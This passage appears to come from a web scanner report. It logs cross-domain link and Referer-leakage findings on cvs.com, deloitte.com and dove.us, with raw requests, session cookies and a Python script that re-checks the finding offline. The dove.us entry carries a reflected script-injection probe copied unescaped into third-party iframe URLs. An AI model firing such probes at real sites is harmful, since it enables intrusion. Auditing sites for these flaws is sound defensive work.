Proxy-Connection: keep-alive
Referer: http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp?promoLandingId=1350&WT.mc_id=PS_ECBC_Google
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A0441D1E876CF59B214E21046F87449.commerce_311; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315345545800:ss=1315345545800

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:47:19 GMT
Server: Apache-Coyote/1.1
X-HP-CAM-COLOR: V=1;ServerAddr=HUTy7wKKcZBJ+snDqdX2/g==;GUID=1|v2-QkLk0k1KwHzJd1VhmMdZIuGGBhJY04BWxnXwFEE7mWgY1E9PA8MxLexKjvy9O|L0NWU0FwcC9zZWFyY2gvc2VhcmNoLmpzcA..
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:47:19 GMT
Vary: Accept-Encoding
Content-Length: 49652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- ************************** search.jsp FRAGMENT STARTS *******************
...[SNIP]...
<li id="photo"><a href="http://www.cvsphoto.com/home.aspx" rel="external" target="_blank" title="Opens CVS Photo Center external site in a new window" onmouseover="document.getElementById('photocentericon').src='/CVSApp/images/common/photo_on.png'" onfocus="document.getElementById('photocentericon').src='/CVSApp/images/common/photo_on.png'" onmouseout="document.getElementById('photocentericon').src='/CVSApp/images/common/photo.png'" onblur="document.getElementById('photocentericon').src='/CVSApp/images/common/photo.png'"><img src="/CVSApp/images/common/photo.png" alt="CVS Photo Center" id="photocentericon" />
...[SNIP]...
<li><a href="http://print.coupons.com/alink.asp?go=14415oj9710" rel="external" target="_blank" title="Opens In-store Coupons external site in a new window">In-store Coupons<span class="hidden">
...[SNIP]...
<li><a href="http://www.minuteclinic.com" target="_blank" title="Opens MinuteClinic external site in a new window" onclick="dcsMultiTrack('DCS.dcsuri','/minuteclinic/default.aspx','WT.ti','Minute Clinic','WT.sp','Rx;OTC');window.open('http://www.minuteclinic.com');return false;">MinuteClinic</a>
...[SNIP]...
<li><a href="http://www.cvsphoto.com/home.aspx" target="_blank" title="Opens CVS Photo external site in a new window">CVS Photo</a></li>
<li><a href="http://cvs.shoplocal.com/cvs/new_user_entry.aspx?action=entryflash&" target="_blank" title="Opens Weekly Store Ads external site in a new window" onclick="dcsMultiTrack('DCS.dcsuri','/shoplocal/circular/default.aspx','WT.ti','Store Circular','WT.sp','Rx;OTC');window.open('http://cvs.shoplocal.com/cvs/new_user_entry.aspx?action=entryflash&');return false;">Weekly Store Ads</a>
...[SNIP]...
<li><a href="http://www.cvscaremark.com" target="_blank" title="Opens CVS Caremark external site in a new window">CVS Caremark</a>
...[SNIP]...
<li><a href="http://www.cvscaremark.com/careers" target="_blank" title="Opens CVS Caremark Careers external site in a new window">Careers</a></li>
<li><a href="http://www.cvscaremark.com/community" target="_blank" title="Opens CVS Caremark Community external site in a new window">Community</a></li>
<li><a href="http://www.cvscaremark.com/investors" target="_blank" title="Opens CVS Caremark Investors external site in a new window">Investors</a></li>
<li><a href="http://www.cvscaremark.com/patient-privacy" target="_blank" title="Opens CVS Caremark Patient Privacy external site in a new window">Patient Privacy</a>
...[SNIP]...
<span class="hidden"><a href="http://get.adobe.com/reader/" rel="external" target="_blank" title="Opens Adobe external site in a new window">Get Adobe PDF Reader</a>
...[SNIP]...
<li><a href="http://www.cvscaremark.com/newsroom" target="_blank" title="Opens CVS Caremark Newsroom external site in a new window">Newsroom</a></li>
<li><a href="http://www.cvscaremarkrealty.com" target="_blank" title="Opens CVS Real Estate external site in a new window">Real Estate</a>
...[SNIP]...
<li><a href="http://www.cvssuppliers.com" target="_blank" title="Opens CVS Suppliers external site in a new window">Suppliers</a>
...[SNIP]...
<div id="vipps" class="lnk_cont_gry">
<a href="http://vipps.nabp.net/verify.asp" target="_blank" title="Opens VIPPS external site in a new window"><img src="/CVSApp/images/common/logo_footer.gif" alt="VIPPS" />
...[SNIP]...

19.85. http://www.deloitte.com/view/en_US/us/search/index.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /view/en_US/us/search/index.htm

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /view/en_US/us/search/index.htm?searchKeywordsField=xss&searchKeywordsFieldDefault=Search&searchBtn.x=0&searchBtn.y=0 HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/Insights/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; s_vnum=1747342618651%26vn%3D2; JSESSIONID=WGW1TmPf5K1hhvSxmVygzvtch6pn6HsRCtV116TYKr7FcvQTJkvN!-755750050; SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; __utma=55230644.1519156675.1315342619.1315342619.1315345938.2; __utmb=55230644.6.10.1315345938; __utmc=55230644; __utmz=55230644.1315345938.2.2.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=100; SC_LINKS=%5B%5BB%5D%5D; s_nr=1315345946709-Repeat; s_invisit=true; s_ppg=us%3Ainsights; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Ainsights%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fdeloitte-ecm-cm-dpm-web%25252Fimages%25252Fdcom%25252Fbtn_go.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 50706
Date: Tue, 06 Sep 2011 16:52:27 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/vgn-ext-templating/common/styles/
...[SNIP]...
<li
>
<a href="https://er0.deloitteonline.com/dol/login.aspx"target='_blank'>Clients</a>
...[SNIP]...
<!-- Begin: www.iperceptions.com --><script defer="defer" type="text/javascript" src="https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0"></script>
...[SNIP]...
</script> <script src="//secure.quantserve.com/quant.js" type="text/javascript"></script> <noscript><img src="//secure.quantserve.com/pixel/p-33Ko2HMIENRZ2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/> </noscript>
...[SNIP]...
<div id="subTools">
   
           <a href='http://www.addthis.com/bookmark.php' onmouseover="var flag2 = loadScript('http://s7.addthis.com/js/250/addthis_widget.js'); if(flag2 == true){return addthis_open(this, '', '[URL]', '[TITLE]');}" onclick=" if(flag2 == true){return addthis_sendto();}" >
               <img src="/deloitte-ecm-cm-dpm-web/images/dcom/i_tool_social.gif" alt='Bookmark' title='Bookmark' />
...[SNIP]...
<noscript>
       
       
       <img src="http://deloitte.122.2o7.net/b/ss/deloittecomnewplatformprod/1/H.2-pdv-2/15535650?...c1=us&v3=en&c2=en&c3=us;en&c5=/view/en_us/us/search/index.htm&c25=/view/en_us/us/search/index.htm&ch=home%20page&h1=view#en_us#us#search#index.htm?searchkeywordsfielddefault=search&searchbtn.x=0&searchbtn.y=0&searchkeywordsfield=xss&c11=0&c34=home&c35=channel&c14=31f8ad0eea0d6110VgnVCM100000ba42f00aRCRD&nullc7=xss&" width="1" height="1" border="0" />
   </noscript>
...[SNIP]...

19.86. http://www.deloitte.com/view/en_US/us/search/index.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /view/en_US/us/search/index.htm

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /view/en_US/us/search/index.htm?searchKeywordsField=broadbacd+ip+cable&searchKeywordsFieldDefault=Search&searchBtn.x=0&searchBtn.y=0 HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/search/index.htm?searchKeywordsField=xss&searchKeywordsFieldDefault=Search&searchBtn.x=0&searchBtn.y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; s_vnum=1747342618651%26vn%3D2; JSESSIONID=WGW1TmPf5K1hhvSxmVygzvtch6pn6HsRCtV116TYKr7FcvQTJkvN!-755750050; SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; __utma=55230644.1519156675.1315342619.1315342619.1315345938.2; __utmb=55230644.8.10.1315345938; __utmc=55230644; __utmz=55230644.1315345938.2.2.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=100; SC_LINKS=%5B%5BB%5D%5D; s_nr=1315345956484-Repeat; s_invisit=true; s_ppg=us%3Asearch; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Asearch%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fdeloitte-ecm-cm-dpm-web%25252Fimages%25252Fdcom%25252Fbtn_go.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:52:39 GMT
Content-Length: 51295
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/vgn-ext-templating/common/styles/
...[SNIP]...
<li
>
<a href="https://er0.deloitteonline.com/dol/login.aspx"target='_blank'>Clients</a>
...[SNIP]...
<!-- Begin: www.iperceptions.com --><script defer="defer" type="text/javascript" src="https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0"></script>
...[SNIP]...
</script> <script src="//secure.quantserve.com/quant.js" type="text/javascript"></script> <noscript><img src="//secure.quantserve.com/pixel/p-33Ko2HMIENRZ2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/> </noscript>
...[SNIP]...
<div id="subTools">
   
           <a href='http://www.addthis.com/bookmark.php' onmouseover="var flag2 = loadScript('http://s7.addthis.com/js/250/addthis_widget.js'); if(flag2 == true){return addthis_open(this, '', '[URL]', '[TITLE]');}" onclick=" if(flag2 == true){return addthis_sendto();}" >
               <img src="/deloitte-ecm-cm-dpm-web/images/dcom/i_tool_social.gif" alt='Bookmark' title='Bookmark' />
...[SNIP]...
<noscript>
       
       
       <img src="http://deloitte.122.2o7.net/b/ss/deloittecomnewplatformprod/1/H.2-pdv-2/266170682?...c1=us&v3=en&c2=en&c3=us;en&c5=/view/en_us/us/search/index.htm&c25=/view/en_us/us/search/index.htm&ch=home%20page&h1=view#en_us#us#search#index.htm?searchbtn.y=0&searchkeywordsfield=broadbacd%20ip%20cable&searchbtn.x=0&searchkeywordsfielddefault=search&c11=0&c34=home&c35=channel&c14=31f8ad0eea0d6110VgnVCM100000ba42f00aRCRD&nullc7=broadbacd%20ip%20cable&" width="1" height="1" border="0" />
   </noscript>
...[SNIP]...

19.87. http://www.deloitte.com/view/en_US/us/search/index.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /view/en_US/us/search/index.htm

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /view/en_US/us/search/index.htm?searchKeywordsField=Dbriefs&searchKeywordsFieldDefault=Search HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vnum=1747342618651%26vn%3D1; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; JSESSIONID=TXZLTmHhpV39Bfbyvx40TblHPS1M1Jn7hpPL9l4NkhxHQzhRSMmw!-755750050; __utma=55230644.1519156675.1315342619.1315342619.1315342619.1; __utmb=55230644.4.10.1315342619; __utmc=55230644; __utmz=55230644.1315342619.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=100; SC_LINKS=us%5E%5EDbriefs%5E%5Eus%20%7C%20Dbriefs%5E%5E; s_nr=1315343832177-New; s_invisit=true; s_ppg=us; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%2526pidt%253D1%2526oid%253Djavascript%25253AsubmitSearchOverlay('Dbriefs')%25253B_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 76178
Date: Tue, 06 Sep 2011 16:17:13 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/vgn-ext-templating/common/styles/
...[SNIP]...
<li
>
<a href="https://er0.deloitteonline.com/dol/login.aspx"target='_blank'>Clients</a>
...[SNIP]...
<!-- Begin: www.iperceptions.com --><script defer="defer" type="text/javascript" src="https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0"></script>
...[SNIP]...
</script> <script src="//secure.quantserve.com/quant.js" type="text/javascript"></script> <noscript><img src="//secure.quantserve.com/pixel/p-33Ko2HMIENRZ2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/> </noscript>
...[SNIP]...
<div id="subTools">
   
           <a href='http://www.addthis.com/bookmark.php' onmouseover="var flag2 = loadScript('http://s7.addthis.com/js/250/addthis_widget.js'); if(flag2 == true){return addthis_open(this, '', '[URL]', '[TITLE]');}" onclick=" if(flag2 == true){return addthis_sendto();}" >
               <img src="/deloitte-ecm-cm-dpm-web/images/dcom/i_tool_social.gif" alt='Bookmark' title='Bookmark' />
...[SNIP]...
<noscript>
       
       
       <img src="http://deloitte.122.2o7.net/b/ss/deloittecomnewplatformprod/1/H.2-pdv-2/-1319978553?...c1=us&v3=en&c2=en&c3=us;en&c5=/view/en_us/us/search/index.htm&c25=/view/en_us/us/search/index.htm&ch=home%20page&h1=view#en_us#us#search#index.htm?searchkeywordsfielddefault=search&searchkeywordsfield=dbriefs&c11=581&c34=home&c35=channel&c14=31f8ad0eea0d6110VgnVCM100000ba42f00aRCRD&nullc7=dbriefs&" width="1" height="1" border="0" />
   </noscript>
...[SNIP]...

19.88. http://www.deloitte.com/view/en_US/us/search/index.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /view/en_US/us/search/index.htm

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /view/en_US/us/search/index.htm?&c=&d=0&sw=0&l=-1&pi=1&q=broadband&st=&sl=&s=0&ct=0&et=0&ec=1&m=0&ps=0&type=0 HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/search/index.htm?searchKeywordsField=broadbacd+ip+cable&searchKeywordsFieldDefault=Search&searchBtn.x=0&searchBtn.y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; s_vnum=1747342618651%26vn%3D2; JSESSIONID=WGW1TmPf5K1hhvSxmVygzvtch6pn6HsRCtV116TYKr7FcvQTJkvN!-755750050; SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; __utma=55230644.1519156675.1315342619.1315342619.1315345938.2; __utmb=55230644.10.10.1315345938; __utmc=55230644; __utmz=55230644.1315345938.2.2.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=100; SC_LINKS=us%3Asearch%5E%5Ebroadband%5E%5Eus%3Asearch%20%7C%20broadband%5E%5E; s_nr=1315345962549-Repeat; s_invisit=true; s_ppg=us%3Asearch; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Asearch%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252Fsearch%25252Findex.htm%25253F%252526c%25253D%252526d%25253D0%252526sw%25253D0%252526l%25253D-1%252526pi%25253D1%252526q%25253Dbroadband%252526st%25253D%252526sl%25253D_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:52:43 GMT
Content-Length: 76933
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/vgn-ext-templating/common/styles/
...[SNIP]...
<li
>
<a href="https://er0.deloitteonline.com/dol/login.aspx"target='_blank'>Clients</a>
...[SNIP]...
<!-- Begin: www.iperceptions.com --><script defer="defer" type="text/javascript" src="https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0"></script>
...[SNIP]...
</script> <script src="//secure.quantserve.com/quant.js" type="text/javascript"></script> <noscript><img src="//secure.quantserve.com/pixel/p-33Ko2HMIENRZ2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/> </noscript>
...[SNIP]...
<div id="subTools">
   
           <a href='http://www.addthis.com/bookmark.php' onmouseover="var flag2 = loadScript('http://s7.addthis.com/js/250/addthis_widget.js'); if(flag2 == true){return addthis_open(this, '', '[URL]', '[TITLE]');}" onclick=" if(flag2 == true){return addthis_sendto();}" >
               <img src="/deloitte-ecm-cm-dpm-web/images/dcom/i_tool_social.gif" alt='Bookmark' title='Bookmark' />
...[SNIP]...
<noscript>
       
       
       <img src="http://deloitte.122.2o7.net/b/ss/deloittecomnewplatformprod/1/H.2-pdv-2/-407970229?...c1=us&v3=en&c2=en&c3=us;en&c5=/view/en_us/us/search/index.htm&c25=/view/en_us/us/search/index.htm&ch=home%20page&h1=view#en_us#us#search#index.htm?pi=1&ec=1&sw=0&type=0&sl=&ct=0&s=0&q=broadband&et=0&m=0&l=-1&ps=0&d=0&c=&st=&c11=34&c34=home&c35=channel&c14=31f8ad0eea0d6110VgnVCM100000ba42f00aRCRD&nullc7=broadband&" width="1" height="1" border="0" />
   </noscript>
...[SNIP]...

19.89. http://www.dove.us/Products/Hair/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dove.us
Path:   /Products/Hair/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1 HTTP/1.1
Host: www.dove.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1
Cookie: ASP.NET_SessionId=p00w4n55ylvqfa45ehz13x45

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 29613
Date: Tue, 06 Sep 2011 16:53:39 GMT
Connection: close

<!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/> <![endif]-->
<!--[if IE 7 ]> <html l
...[SNIP]...
<li class="social-icons"><a title="facebook" target="_blank" href="http://www.facebook.com/dove">
<img height="20" width="22" alt="facebook" src="/Resources/Images/buttons/logo_fb.png"></a> <a title="twitter" target="_blank" href="http://twitter.com/#/Dove"><img height="20" width="21" alt="FaceBook" src="/Resources/Images/buttons/logo_twit.png">
...[SNIP]...
<!--Facebook begins-->
<iframe src="http://www.facebook.com/plugins/like.php?app_id=165670856825683&amp;href=http://www.dove.us/Products/Hair/default.aspx?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1&amp;
   send=false&amp;layout=button_count&amp;width=140&amp;show_faces=true&amp;action=recommend&amp;colorscheme=light&amp;font=arial&amp;
   height=21" title="Recommend" scrolling="no" frameborder="0" style="border: none; float: right;
overflow: hidden; width: 140px; height: 21px;" allowtransparency="true">
</iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4dbe77462edfeaf6">
</script>
...[SNIP]...
</h2>

<iframe src="http://www.facebook.com/plugins/activity.php?site=http://www.dove.us/Products/Hair/default.aspx?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1&amp;width=320&amp;height=236&amp;header=false&amp;colorscheme=light&amp;font=arial&amp;border_color=%23ffffff&amp;recommendations=true"
scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:320px; height:236px;" allowTransparency="true">
</iframe>
...[SNIP]...
<li><a title="Unilever Logo" href="http://www.unilever.com" target="_blank"><img alt="Unilever Logo" src="/Resources/Images/style/footer-unilever-logo.png">
...[SNIP]...
<li><a title="Privacy Policy" href="https://secure.unileverus.com/privacy/policy.html?site=www.dove.com" target="_blank">Privacy Policy</a>
...[SNIP]...
<li><a title="Terms of Use" href="http://www.unileverus.com/terms/termsofuse.html" target="_blank">Terms of Use</a>
...[SNIP]...
<li><a title="Disclaimer" href="http://content.dove.us/utilities/disclaimer/" target="_blank">Disclaimer</a>
...[SNIP]...
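Added example (not part of the XSS.CX report or of the scanner that produced it): a small Python reproduction of the check behind the cross-domain entries above. It takes the URL a page was requested with and the HTML it returned, lists every link, script, image, iframe, stylesheet and form target on another host, names the hosts that will receive the page's query string in the Referer header, and flags third-party URLs into which a query-string key or value was copied, which is what entry 19.89 shows with its Facebook plugin iframes. SAMPLE_URL and SAMPLE_HTML are constructed for the example, modelled on that entry, and are not the report's captured traffic.

```python
"""Offline re-implementation of the check behind the cross-domain entries
above (a page loaded with a query string that links to other domains).

Added example, not code from the XSS.CX report or from the scanner that
produced it. Given the URL a page was requested with and the HTML it returned,
it collects every a/link/img/script/iframe/form URL on a different host and
reports:

  * hosts      - third-party hosts that receive the query string via Referer;
  * reflected  - third-party URLs into which a query-string key or value was
                 copied (as the dove.us page does with its Facebook plugin
                 iframes), so the value also travels in the request line.

SAMPLE_URL and SAMPLE_HTML are constructed, modelled on entry 19.89.
"""
from html.parser import HTMLParser
from urllib.parse import parse_qsl, unquote, urljoin, urlsplit

# Attributes whose URL the browser fetches or navigates to.
_URL_ATTRS = {"a": "href", "link": "href", "img": "src", "script": "src",
              "iframe": "src", "form": "action"}


class _LinkCollector(HTMLParser):
    """Gathers absolute URLs from the attributes listed in _URL_ATTRS."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.urls = []

    def handle_starttag(self, tag, attrs):
        wanted = _URL_ATTRS.get(tag)
        for name, value in attrs:
            if name == wanted and value:
                # HTMLParser has already decoded &amp; in the attribute value;
                # urljoin resolves relative and protocol-relative (//host/) URLs.
                self.urls.append(urljoin(self.base_url, value.strip()))


def _host(url):
    return (urlsplit(url).hostname or "").lower()


def cross_domain_links(page_url, html):
    """Absolute URLs in the response whose host differs from the page's host."""
    collector = _LinkCollector(page_url)
    collector.feed(html)
    own = _host(page_url)
    seen, out = set(), []
    for url in collector.urls:
        host = _host(url)
        if host and host != own and url not in seen:   # exact-host comparison
            seen.add(url)
            out.append(url)
    return out


def referer_leakage(page_url, html):
    """Classify a page the way the report's cross-domain entries do."""
    query = urlsplit(page_url).query
    links = cross_domain_links(page_url, html)
    # Keys and values of at least four characters; short tokens such as "1"
    # would match almost any URL by accident.
    needles = [part for k, v in parse_qsl(query, keep_blank_values=True)
               for part in (k, v) if len(part) >= 4]
    reflected = [u for u in links if any(n in unquote(u) for n in needles)]
    return {
        "query": query,
        "hosts": sorted({_host(u) for u in links}) if query else [],
        "reflected": reflected,
    }


# Constructed sample modelled on entry 19.89: the probe in the query string
# is copied verbatim into the Facebook plugin iframe's src attribute.
SAMPLE_URL = ("http://www.dove.us/Products/Hair/"
              "?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1")
SAMPLE_HTML = """
<a title="facebook" target="_blank" href="http://www.facebook.com/dove">
<img alt="facebook" src="/Resources/Images/buttons/logo_fb.png"></a>
<iframe src="http://www.facebook.com/plugins/like.php?app_id=165670856825683&amp;href=http://www.dove.us/Products/Hair/default.aspx?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1&amp;send=false"></iframe>
<script src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4dbe77462edfeaf6"></script>
<script src="//secure.quantserve.com/quant.js"></script>
<a href="https://secure.unileverus.com/privacy/policy.html?site=www.dove.com" target="_blank">Privacy Policy</a>
"""

if __name__ == "__main__":
    result = referer_leakage(SAMPLE_URL, SAMPLE_HTML)
    print("query string   :", result["query"])
    print("Referer goes to:", ", ".join(result["hosts"]))
    for url in result["reflected"]:
        print("query copied into third-party URL:", url)
```

Run it directly to print the classification for the sample, or call referer_leakage() with a saved request URL and response body to repeat the check on any other entry. The host comparison is deliberately exact: a link from www.dove.us to secure.unileverus.com is still a cross-domain fetch and still carries the Referer, and the "reflected" list is the case worth reading first, because there the query string reaches the third party in the request line as well, regardless of any referrer policy.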

19.90. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /plugins/activity.php?site=http://www.dove.us/Products/Hair/default.aspx&width=320&height=236&header=false&colorscheme=light&font=arial&border_color=%23ffffff&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
